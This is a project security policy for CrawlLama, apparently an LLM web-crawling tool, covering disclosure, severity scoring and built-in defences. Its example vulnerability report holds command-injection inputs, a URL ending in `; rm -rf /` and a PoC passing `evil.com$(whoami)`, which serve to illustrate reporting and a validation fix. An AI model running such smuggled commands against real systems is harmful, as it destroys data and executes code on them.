The security of CrawlLama is important to us. If you discover a vulnerability, please report it responsibly.
We provide security updates for the following versions:

| Version | Supported |
|---|---|
| 1.4.9 | :white_check_mark: |
| 1.3.x | :x: |
| 1.2.x | :x: |
| < 1.2 | :x: |
Do NOT create public GitHub Issues for vulnerabilities. This could put other users at risk.
Please report vulnerabilities responsibly, using the subject line `[SECURITY] Short Description`.

Please provide as many details as possible:
Example:
**Vulnerability:** Command Injection in page_reader.py
**Version:** v1.3.0
**Description:**
The function `fetch_page()` in `tools/page_reader.py` does not properly validate user input, which can lead to command injection.
**Steps:**
1. Start CrawlLama
2. Enter the following URL: `http://example.com; rm -rf /`
3. Command is executed on the system
**Impact:**
Remote Code Execution (RCE) as the user running CrawlLama
**PoC:**
```python
from tools.page_reader import fetch_page
fetch_page("http://evil.com$(whoami)")
```

**Suggestion:**
URL validation with `validators.url()` before processing
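The suggested fix can be sketched without the third-party `validators` package. The check below is an illustrative stand-in (not CrawlLama's actual implementation): it accepts only well-formed `http(s)` URLs and rejects anything containing shell metacharacters, which blocks the injection payload from the example above.

```python
from urllib.parse import urlparse

# Characters with special meaning to a shell; their presence suggests injection.
SHELL_METACHARS = set(";|&$`<>(){}")

def is_safe_url(url: str) -> bool:
    """Accept only well-formed http(s) URLs free of shell metacharacters."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return False
    return not (SHELL_METACHARS & set(url))

print(is_safe_url("http://example.com/page"))   # True
print(is_safe_url("http://evil.com$(whoami)"))  # False
```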
We strive for the following response times:
We use the CVSS v3.1 scoring system:

| Severity | CVSS Score | Examples |
|---|---|---|
| Critical | 9.0-10.0 | RCE, Authentication Bypass |
| High | 7.0-8.9 | SQL Injection, XSS |
| Medium | 4.0-6.9 | CSRF, Information Disclosure |
| Low | 0.1-3.9 | Minor Information Leaks |
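The bucket boundaries in the table can be expressed as a small helper; this is a sketch whose thresholds follow the standard CVSS v3.1 severity ratings:

```python
def cvss_severity(score: float) -> str:
    """Map a CVSS v3.1 base score to the severity buckets in the table."""
    if score >= 9.0:
        return "Critical"
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    if score >= 0.1:
        return "Low"
    return "None"

print(cvss_severity(9.8))  # Critical
```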
CrawlLama is designed for local operation. All LLM processing (Ollama) happens locally, ensuring data privacy. However, web searches and data fetching inherently require internet access and are not local operations. For enhanced privacy during these operations, we recommend using a VPN or proxy.
If exposed publicly (e.g. via FastAPI), apply these mitigations:

- Rate limiting (`security.rate_limit`)
- Domain blacklist (`data/blacklist.txt`)
- Hallucination detection (`core/hallu_detect.py`)

We monitor dependencies regularly:
```bash
# Check dependencies
pip-audit
safety check

# Or with our script
python scripts/check_dependencies.py
```
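The contents of `scripts/check_dependencies.py` are not shown here; a minimal version could parse `pip-audit -f json` output and fail the build when any vulnerability is found. The JSON shape assumed below matches current pip-audit releases but may change between versions:

```python
import json

def count_vulnerabilities(pip_audit_json: str) -> int:
    """Count vulnerabilities reported by `pip-audit -f json`."""
    report = json.loads(pip_audit_json)
    return sum(len(dep.get("vulns", [])) for dep in report.get("dependencies", []))

# Placeholder report with one finding (package name and ID are illustrative).
sample = '{"dependencies": [{"name": "example-pkg", "version": "1.0", "vulns": [{"id": "EXAMPLE-0001"}]}]}'
print(count_vulnerabilities(sample))  # 1
```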
Automatic updates: Dependabot is enabled and creates PRs for security updates.
CrawlLama has the following built-in security features:
```
# API Key Authentication
X-API-Key: your-secure-api-key-here
```
```
# Role-Based Access Control (RBAC)
# - admin: Full access to all endpoints
# - user: Standard access (queries, memory, sessions)
# - read_only: Read-only access (queries only)
```
```
# Cross-Site Request Forgery protection
# Required for all state-changing operations (POST/PUT/PATCH/DELETE)

# 1. Get CSRF token
POST /csrf-token
Headers: X-API-Key: your-key

# 2. Use token in subsequent requests
POST /config
Headers:
  X-API-Key: your-key
  X-CSRF-Token: token-from-step-1
```
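From a client's perspective, the two-step flow above could look like this. This is a standard-library sketch: the base URL and API key are placeholders, and the requests are only constructed, not sent.

```python
from urllib.request import Request

BASE = "http://localhost:8000"  # placeholder deployment URL
API_KEY = "your-key"            # placeholder API key

# Step 1: request a CSRF token with the API key alone.
token_request = Request(f"{BASE}/csrf-token", method="POST",
                        headers={"X-API-Key": API_KEY})

# Step 2: attach both headers to every state-changing request.
def protected_request(path: str, csrf_token: str) -> Request:
    return Request(f"{BASE}{path}", method="POST",
                   headers={"X-API-Key": API_KEY, "X-CSRF-Token": csrf_token})

config_request = protected_request("/config", "token-from-step-1")
```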
```python
# utils/validators.py
validate_url()           # Check URL format
validate_query()         # Check query length/content
sanitize_output()        # Clean LLM output
validate_url_ssrf_safe() # SSRF protection with DNS rebinding detection
```
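The core idea behind an SSRF-safe URL check can be sketched as follows. This is illustrative, not CrawlLama's actual `validate_url_ssrf_safe()`: it resolves the hostname and rejects private, loopback, link-local, and reserved addresses. A full DNS-rebinding defense additionally requires connecting to the resolved IP rather than re-resolving the hostname, which is omitted here.

```python
import ipaddress
import socket
from urllib.parse import urlparse

def is_ssrf_safe(url: str) -> bool:
    """Reject URLs whose host resolves to a private/loopback/reserved address."""
    host = urlparse(url).hostname
    if not host:
        return False
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return False
    for info in infos:
        ip = ipaddress.ip_address(info[4][0])
        if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
            return False
    return True
```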
```
# Distributed rate limiting with Redis
# Falls back to in-memory if Redis unavailable
# Per-user, per-endpoint limits
# Default: 60 requests/minute
# Configurable via RATE_LIMIT environment variable
```
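The in-memory fallback can be illustrated with a sliding-window counter keyed per user and endpoint (a sketch under the stated defaults, not the actual implementation):

```python
import time
from collections import defaultdict, deque

class InMemoryRateLimiter:
    """Sliding-window limiter per (user, endpoint); default 60 requests/minute."""

    def __init__(self, limit=60, window=60.0):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)  # (user, endpoint) -> timestamps

    def allow(self, user, endpoint, now=None):
        """Return True if the request fits the window, recording it if so."""
        now = time.monotonic() if now is None else now
        q = self.hits[(user, endpoint)]
        while q and now - q[0] >= self.window:
            q.popleft()  # drop timestamps outside the window
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True
```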
```
# Enhanced session security
# - Session timeout (24 hours default)
# - IP address tracking
# - Last activity tracking
# - Session refresh capability

POST /session/refresh  # Extend session expiration
```
```
# Comprehensive security event logging
# - All API requests logged
# - Authentication/authorization events
# - Configuration changes
# - Security events (CSRF, rate limits)

# Query audit logs (admin only):
GET /admin/audit/logs?event_type=authentication&status=failure
```
```
# Graceful key rotation with zero downtime
# Multiple active keys per user

# Generate new key:
POST /admin/api-keys/generate

# Rotate existing key:
POST /admin/api-keys/rotate

# List your keys:
GET /admin/api-keys/list

# Revoke old key:
DELETE /admin/api-keys/revoke/{key_id}
```
```
# data/blacklist.txt
# Blocks known malicious domains
malware-site.com
phishing-domain.net
```
```python
# API keys are stored encrypted
from utils.secure_config import SecureConfig

config = SecureConfig()
config.set_key("api_key", "secret")  # Encrypted
```
```python
# Plugins run in a separate namespace
# No access to sensitive data
# Path traversal protection
```
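Path traversal protection typically means resolving a requested plugin path and refusing anything that escapes the plugin directory. The helper below is hypothetical (the function name and `plugins/` directory are assumptions, not CrawlLama's actual code):

```python
from pathlib import Path

PLUGIN_ROOT = Path("plugins").resolve()  # assumed plugin directory

def safe_plugin_path(name: str) -> Path:
    """Reject plugin names that resolve outside the plugin directory."""
    candidate = (PLUGIN_ROOT / name).resolve()
    if not candidate.is_relative_to(PLUGIN_ROOT):
        raise ValueError(f"path traversal attempt: {name!r}")
    return candidate
```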
All responses include comprehensive security headers:
- `Content-Security-Policy`: Strict CSP to prevent XSS
- `X-Content-Type-Options: nosniff`: Prevent MIME sniffing
- `X-Frame-Options: DENY`: Prevent clickjacking
- `X-XSS-Protection: 1; mode=block`: Legacy XSS protection
- `Strict-Transport-Security`: Force HTTPS (when using HTTPS)
- `Referrer-Policy: strict-origin-when-cross-origin`: Control referrer leakage

CSRF protection includes Origin and Referer header validation for all state-changing requests.
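As a sketch, that header set could be emitted from a single mapping; the CSP and HSTS values below are representative placeholders, not CrawlLama's exact policy:

```python
# Representative security headers to attach to every response.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "X-XSS-Protection": "1; mode=block",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Referrer-Policy": "strict-origin-when-cross-origin",
}

def apply_security_headers(response_headers: dict) -> dict:
    """Merge the security headers into an existing header dict."""
    return {**response_headers, **SECURITY_HEADERS}
```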
Automatic security configuration validation on startup:
Use `.env` for API keys and secrets:

```bash
# .env
CRAWLLAMA_API_KEY=your-strong-api-key-min-32-chars
ALLOWED_HOSTS=yourdomain.com,www.yourdomain.com
ALLOWED_ORIGINS=https://yourdomain.com,https://www.yourdomain.com
RATE_LIMIT_SECRET=your-secret-for-rate-limiting
REDIS_URL=redis://localhost:6379/0  # For distributed deployments
```
- Monitor `/admin/audit/logs` regularly for suspicious activity
- Use `validators.py` for all inputs
- Keep secrets in `.env`
- Run `pip-audit` before every release
- Add `Depends(verify_csrf_token)` to state-changing endpoints
- Use `Depends(verify_role(Role.ADMIN))` for admin-only endpoints
- Use `audit_logger` for security-relevant actions
- Set `SECURITY_STRICT_MODE=true` to block on security issues
- Check that `pip-audit` shows no critical/high vulnerabilities
- Ensure `.env.example` contains only placeholders

After fixing a vulnerability:
We thank the following security researchers for responsible disclosure:
No reports yet - be the first!
Currently, we have no official bug bounty program.
However, we honor all security reports with:
Thank you for helping keep CrawlLama secure!